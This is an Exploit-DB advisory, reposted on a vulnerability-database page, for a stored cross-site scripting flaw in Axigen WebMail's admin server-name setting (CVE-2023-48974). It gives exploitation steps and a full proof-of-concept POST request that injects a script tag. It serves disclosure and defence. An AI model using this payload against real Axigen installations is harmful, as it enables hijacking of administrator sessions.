Vulners
Lucene search
Axigen < 10.5.7 - Persistent Cross-Site Scripting
🗓️ 02 Apr 2024 00:00:00Reported by Vincent McRae, Mesut CetinType 
exploitdb🔗 www.exploit-db.com👁 398 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2023-48974 | 8 Feb 202402:21 | – | circl |
 | Axigen Cross-Site Scripting Vulnerability | 8 Feb 202400:00 | – | cnnvd |
 | CVE-2023-48974 | 8 Feb 202400:00 | – | cve |
 | CVE-2023-48974 | 8 Feb 202400:00 | – | cvelist |
 | CVE-2023-48974 | 8 Feb 202401:15 | – | nvd |
 | Cross site scripting | 8 Feb 202401:15 | – | prion |
 | PT-2024-13666 · Axigen · Axigen Webmail | 7 Feb 202400:00 | – | ptsecurity |
 | CVE-2023-48974 | 23 May 202504:42 | – | redhatcve |
 | CVE-2023-48974 | 8 Feb 202400:00 | – | vulnrichment |
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974
Description
The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) due to unsanitized or unfiltered processing. This means
that an attacker can inject malicious code into this parameter, which will
then be executed by other users when they view the page where the parameter
is used. This is affecting authenticated administrators, and the attack can
be used to attack other administrators with more permissions.
Exploitation
1. Login as administrator
2. Navigate to "global settings"
3. Change server name to <script>alert(1)</script>
PoC of the POST request:
```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
menuLeftTopPosition=-754
Content-Type: multipart/form-data;
boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"
<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"
axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"
--SNIP--
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"
Save Configuration
-----------------------------41639384187581032291088896642--
```
#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2024 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.19.6
EPSS0.06582
SSVC